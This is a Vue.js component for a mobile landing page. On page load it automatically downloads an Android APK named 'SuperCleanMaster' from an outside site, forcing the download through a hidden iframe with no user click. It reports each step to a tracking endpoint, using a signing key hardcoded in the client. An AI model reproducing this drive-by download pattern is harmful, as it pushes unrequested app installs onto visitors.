<template>
  <div class="main" v-title data-title="My-SCA">
    <img src="../img/bg_boost.png" alt="Bg" id="bgImg">
    <!--下载按钮-->
    <div class="main-box">
      <div class="btn-loading-box center ani-1" v-if="isDow" @click="clickDowApk">
        <div class="bar ani-2" style="width: 100%"></div>
        <span class="icon center">
                <img src="../img/dow_icon.png" v-show="downloadIcon">
                <img src="../img/finish_icon.png" v-show="!downloadIcon">
              </span>
        <span class="title">Download</span>
        <div class="bar-bottom ani-2" :style="{width: dowPar + '%'}"></div>
      </div>
<!--      <div class="btn-download center ani-1" v-else>-->
<!--        <span class="icon center"><img src="../img/dow_icon.png"></span>-->
<!--        <span>Download</span>-->
<!--      </div>-->
    </div>
  </div>
</template>

<script>
// 保存模块
var FileSaver = require('file-saver');
// 引入加密模块,对密码进行处理
// const JSEncrypt = require('jsencrypt');
// let Base64 = require('js-base64').Base64;
let layer = require('layer-mobile');
let qs = require('qs');
let md5 = require('md5');
export default {
  data () {
    return {
      downloadIcon:true,
      isDow: true,
      dowPar: 0,
      isDowOk: false,
      apkName: "",
      pid: 0,
      uuid: 0,
      gaid: 0,
      url: "",
      isTest: '',
      isAutoDow: true, // 自动下载过的第二次进入不再下载
      isLoadings: false,
      cache_start_time: 0,
      cache_end_time: 0,
    }
  },
  name: 'Home',
  props: {
    msg: String
  },
  mounted () {
    this.initData();
  },
  computed: {},
  methods: {
    initData () {

      let self = this;
      // var conf = this.getRequest(window.location.href);
      // if (conf === undefined) {
      //       self.layer('无参数', 3);
      //       return;
      //   }
      let dataStr = false;
      try {
        // dataStr = Base64.decode(conf);
      } catch (e) {
        console.log(e);
        self.layer('解析base64失败-' + dataStr, 3);
        return;
      }
      // if (!dataStr) {
      //     return;
      // }

      // 从链接获取的base64解析物料
      // let data = dataStr.split("|")
      // self.pid = data[0];
      // self.uuid = data[1];
      // self.gaid = data[2];
      // self.url = data[3];

      // 写死物料
      self.pid = '5011';
      self.uuid = '333166c0-f8fc-497c-8fc3-0bf0f11dccb7';
      self.gaid = '47d6c7f6-fc74-4136-89b6-25e898609723';
      // self.url = 'https://wapagame.com/apk/com.to.kal.happy.placebase.apk';
      self.url = 'https://wapagame.com/apk/com.to.kal.happy.placebase.apk?'+new Date().getTime();
      self.apkName = 'SuperCleanMaster';

      // let urlList = self.url.split("/");
      // if (urlList.length > 0) {
      //     self.apkName = urlList[urlList.length - 1];
      // }
      self.stats('s_h5');
      // const autoDow = localStorage.getItem("autoDow");
      // if (autoDow == 'ok') {
      //     self.isAutoDow = false;
      // }
      self.autoDow();
    },
    getTime () {
      return (new Date().getTime() / 1000).toFixed(0);
    },
    autoDow () {
      console.log('autoDow')
      let self = this;
      window.URL = window.URL || window.webkitURL;
      var xhr = new XMLHttpRequest();

      xhr.open('GET', self.url, true);
      xhr.responseType = 'blob';
      xhr.onprogress = function (e) {
        self.dowPar = ((e.loaded / e.total) * 100).toFixed(0);
        if (!self.isLoadings) {
          // self.stats('s_button_zhong');
          self.stats('apk_download');
          self.cache_start_time = self.getTime()
          // self.stats('cache_start');
          self.isLoadings = true;
        }
      }
      xhr.onload = function () {
        if (this.status == 200) {
          self.dowBlob = this.response;
          // console.log(self.dowBlob, e);
          self.layer('缓存成功' + self.cache_end_time + "-" + self.cache_start_time, 3);
          self.cache_end_time = self.getTime();
          // const time = self.cache_end_time - self.cache_start_time;
          // self.stats('cacge_success', time);
          self.downloadIcon =false;
          // self.stats('s_button_done');
          self.stats('apk_download_done');

          self.isDowOk = true;
          if (self.isAutoDow) {
            self.isAutoDow = false;
            // localStorage.setItem("autoDow", "ok");
            // localStorage.setItem("apkName", self.apkName);
            self.httpDow();
          }
        }
      };
      xhr.send();
    },
    clickDowApk () {
      let self = this;
      self.layer('点击调用下载-取消自动下载', 3);
      self.isAutoDow = false;
      self.stats('c_h5_button', 2);
      self.httpDow();
    },
    dowApk () {
      let self = this;
      if (self.dowBlob) {
        FileSaver.saveAs(self.dowBlob, self.apkName);
      }
    },
    httpDow () {
      let self = this;
      var iframe = document.createElement('iframe');
      iframe.style.display = 'none';
      // eslint-disable-next-line no-useless-escape
      iframe.src = "javascript: '<script>location.href=\"" + self.url + "\"<\/script>'";
      document.getElementsByTagName('body')[0].appendChild(iframe);
    },
    getRequest (urlStr) {
      let url = "";
      if (typeof urlStr == "undefined") {
        url = decodeURI(location.search); //获取url中"?"符后的字符串
      } else {
        url = "?" + urlStr.split("?")[1];
      }
      var theRequest = new Object();
      if (url.indexOf("?") != -1) {
        module.exports
        theRequest = url.substr(1);
      }
      return theRequest;
    },
    layer (content, time) {

      let self = this;
      if (isNaN(time)) {
        time = 2;
      }
      if (self.isTest) {
        // console.log(content, time)
        //提示
        layer.open({ content: '测试-' + content, skin: 'msg', time: time });
      }
    },
    // eslint-disable-next-line no-unused-vars
    stats (keyStr, par1) {
      let self = this;
      const tims = self.getTime();
      const u = navigator.userAgent;
      const isiOS = !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/);
      let language = (navigator.browserLanguage || navigator.language).toLowerCase();

      if (isNaN(par1)) {
        par1 = 0;
      }
      let request_data = [
        {
          "product_id": self.pid,
          "uuid": self.uuid,
          "time_stamp": tims,
          "package_name": "SuperCleanMaster",
          "country": language,
          "media_source": "other",
          "campaign": "other_campaign",
          "version_code": 1,
          "version_name": "1.0",
          "google_aid": "4567-8901-3344-5678",
          "stats_sdk_version": "0.1",
          "install_days": 1,
          "is_upgrade_user": 1,
          "process_uuid": "abc-efg-uvw-xyz-c",
          "os": isiOS ? 2 : 1,
          "os_version": "8.0",
          "os_language": language,
          "phone_model": "phone_model",
          "net": "WIFI",
          "memory": 2,
          "dpi": 50,
          "screen_wh": document.body.clientWidth + "x" + document.body.clientHeight,
          "screen_inchu": "4.9",
          "imei": "123456789",
          "imsi": "987654321",
          "src": 513,
          "event": keyStr,
          "eb_key1": par1,
          "eb_key2": 0,
        }
      ];
      if (keyStr == 's_h5') {
        request_data[0]["productID"] = self.pid;
        request_data[0]["userID"] = self.uuid;
      }

      //签名加密
      const key = 'L9gh=p%Eozfn2#@';
      const request_data_str = JSON.stringify(request_data);
      const sign = md5(key + request_data_str + key + tims + key);
      let obj = {
        request_data: request_data_str,
        timestamp: tims,
        sign: sign,
      }

      const url = 'https://n278.yuchaoplay.com/service_stats/v3/collect';
      self.$axios.post(url, qs.stringify(obj))
          .then(function (response) {
            let data = response.data;
            if (data) {
              console.log('统计成功',keyStr,par1)
            }
          })
          .catch(function (error) {
            console.log(error.data);
          });
    }

  }
}
</script>
